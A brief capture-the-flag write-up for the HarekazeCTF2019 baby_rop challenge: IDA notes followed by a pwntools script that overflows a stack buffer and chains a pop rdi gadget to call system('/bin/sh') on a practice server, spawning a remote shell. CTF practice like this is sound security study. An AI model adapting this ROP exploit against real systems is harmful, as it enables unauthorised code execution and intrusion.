[HarekazeCTF2019]baby_rop
用 IDA 分析程序：
main 函数
system 的地址
并且发现程序中有 /bin/sh 字符串
exp:
from pwn import *
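# Solution script for the HarekazeCTF2019 baby_rop challenge (CTF practice target).
# It overflows a stack buffer and replaces the saved return address with a short
# ROP chain that calls system("/bin/sh"), using only pieces already in the binary.
# NOTE(review): hard-coded addresses only work if the binary loads at a fixed
# base (no PIE) and the vulnerable function has no stack canary. Presumably
# that is the case here; confirm with checksec. Those two mitigations are what
# would break this chain.
p = remote('node3.buuoj.cn', 29598)

binsh_addr = 0x0000000000601048  # address of the "/bin/sh" string found in the binary
sys_addr = 0x0000000000400490    # address of system, as read from IDA
pop_rdi = 0x400683               # gadget address; by its name, `pop rdi; ret`

# Padding is presumably a 0x10-byte buffer plus the 8-byte saved RBP.
# TODO confirm against main's stack frame in IDA.
# The padding is a bytes literal because p64() returns bytes; concatenating a
# str with it raises TypeError on Python 3.
payload = b'a' * (0x10 + 8) + p64(pop_rdi) + p64(binsh_addr) + p64(sys_addr)
p.sendline(payload)

# A single interactive() call is enough; the original repeated it.
p.interactive()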